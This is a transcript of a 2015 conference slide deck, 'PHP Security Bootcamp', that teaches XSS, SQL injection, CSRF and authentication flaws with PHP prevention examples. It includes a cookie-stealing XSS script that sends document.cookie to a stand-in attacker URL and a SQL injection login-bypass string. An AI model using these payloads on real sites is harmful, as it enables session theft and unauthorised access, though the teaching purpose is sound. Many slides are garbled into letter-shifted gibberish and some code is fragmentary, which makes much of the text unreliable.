Upgrade to Pro — share decks privately, control downloads, hide ads and more …

PHP Security Bootcamp

PHP Security Bootcamp

The web is becoming a more and more dangerous place every day. You, as a PHP application developer, need to be armed with the tools and knowledge to make your applications as secure as possible. Come get hands-on training in applying secure design principles, testing code for vulnerabilities and fixing the problems we find together. We'll be using a vulnerable application to illustrate some of the most common vulnerabilities like cross-site scripting, SQL injection and other notables from the OWASP Top 10 list. You'll walk away with a grasp of good secure coding practices and a platform for future experimentation.

At Lone Star PHP 2015

Chris Cornutt

April 18, 2015
Tweet

More Decks by Chris Cornutt

Other Decks in Technology

Transcript

  1. Secure PHP Development
    $ISJT$PSOVUU!FOZHNB

    View full-size slide

  2. 1)1%FW:FBST
    "QQTFD&OHJOFFS
    IUUQXFCTFDJP
    IUUQTFDVSJOHQIQDPN

    View full-size slide

  3. Goals
    #BTJDBQQTFDQSJODJQMFT
    7VMOFSBCJMJUJFT&YQMPJUT
    )BOETPOFYQFSJFODF
    5PPMT5FDIOJRVFT

    View full-size slide

  4. IUUQCJUMZPXBTQUPQ

    View full-size slide

  5. 5IFSF`T
    OPTVDIUIJOH
    BTTFDVSF

    View full-size slide

  6. IUUQTHJUIVCDPNQTFDJPOPUDI
    /PUDI"7VMOFSBCMF"QQMJDBUJPO

    View full-size slide

  7. IUUQTHJUIVCDPNQTFDJPOPUDI
    4FUVQ5JNF
    PSIUUQOPUDITFDVSJOHQIQDPN

    View full-size slide

  8. XSS:
    Cross Site Scripting

    View full-size slide

  9. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF
    VTVBMMZ+BWBTDSJQU
    SFqFDUFEWTTUPSFE
    QPPSPVUQVUFTDBQJOH

    View full-size slide

  10. $44
    +BWBTDSJQU
    )5.-
    )5.-"UUSJCVUF
    2VFSZWBMVF
    Context
    style: foo-=$input?>
    var name = “=$input?>”;
    =$input?>
    ”>foo
    $url = “http://foo.com?data=“.$input

    View full-size slide

  11. Example
    echo “Howdy, my name is “.$_GET[‘name’];
    ?>
    ?name=alert(“xss”)

    View full-size slide

  12. Example
    <br/>xmlhttp = new XMLHttpRequest();<br/>xmlhttp.open(<br/>'GET',<br/>‘http://leethack.php?cookies=‘+document.cookie,<br/>true);<br/>xmlhttp.send();<br/>
    "TTVNFTDSPTTPSJHJOQPMJDZPG

    View full-size slide

  13. Prevention #1
    $name = htmlspecialchars(
    $_GET[‘name’], ENT_COMPAT, ‘UTF-8’
    );
    echo “Howdy, my name is “.$name;
    ?>
    /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

    View full-size slide

  14. Prevention #2
    {{ name|e(‘html’) }}
    {{ name|e(‘html_attr’) }}
    {{ name|e(‘js’) }}
    {{ name|e(‘css’) }}
    /PUF5IJTFYBNQMFSFRVJSFT5XJH

    View full-size slide

  15. SQLi:
    SQL Injection

    View full-size slide

  16. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT
    FYQPTFEBUB
    CZQBTTBVUINFDIBOJTNT
    QPPSJOQVUpMUFSJOH

    View full-size slide

  17. Example
    $sql = ‘select id
    from users
    where username = “‘.$_POST[‘username’].’”
    and password = “‘.$_POST[‘password’].’”’;
    password=‘ or 1=1; #
    select id
    from users
    where username = “user1”
    and password = “” or 1=1; #

    View full-size slide

  18. BEE@TMBTIFT
    NZTRM@SFBM@FTDBQF@TUSJOH
    NZTRMJ@SFBM@FTDBQF@TUSJOH

    View full-size slide

  19. BEE@TMBTIFT
    NZTRM@SFBM@FTDBQF@TUSJOH
    NZTRMJ@SFBM@FTDBQF@TUSJOH
    X

    View full-size slide

  20. 1SFQBSFETUBUFNFOUT
    1%0
    .ZTRMJ

    View full-size slide

  21. Prevention
    $stmt = $dbh->prepare(‘select id from users’
    .’ where username = :user’
    .’ and password = :pass’);
    $stmt->execute(array(
    ‘user’ => $_POST[‘username’],
    ‘pass’ => $_POST[‘password’]
    ));
    $results = $stmt->fetchAll(PDO::FETCH_ASSOC);
    ?>
    /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

    View full-size slide

  22. CSRF:
    Cross Site Request
    Forgery

    View full-size slide

  23. VOWBMJEBUFEGPSNTVCNJTTJPO
    POBMMTUBUFDIBOHFT
    XIBU`TUIFTPVSDF
    TJNQMF
    SBOEPNJ[FE GPSFBDIGPSN

    View full-size slide

  24. Example




    value=“098f6bcd4621d373cade4e832627b4f6”
    name=“csrf-token”/>

    View full-size slide

  25. Auth*:
    Authentication &
    Authorization

    View full-size slide

  26. EJSFDUPCKFDUSFGFSFODF "

    EBUBBDDFTT
    EBOHFSPVTBDUJPOT
    QPPSVTFSNBOBHFNFOU

    View full-size slide

  27. QMBJOUFYUQBTTXPSET
    OPQBTTXPSEQPMJDZ
    PWFSMZDPNQMFYQBTTXPSET
    QBTTXPSEIJOUT

    View full-size slide

  28. But wait, there’s
    more…

    View full-size slide

  29. 4FDVSJUZ.JTDPOpHVSBUJPO
    4FOTJUJWF%BUB&YQPTVSF
    $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT
    6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

    View full-size slide

  30. 5IBU`TBMMGPMLT
    !FOZHNB
    !TFDVSJOHQIQ
    IUUQTFDVSJOHQIQDPN

    View full-size slide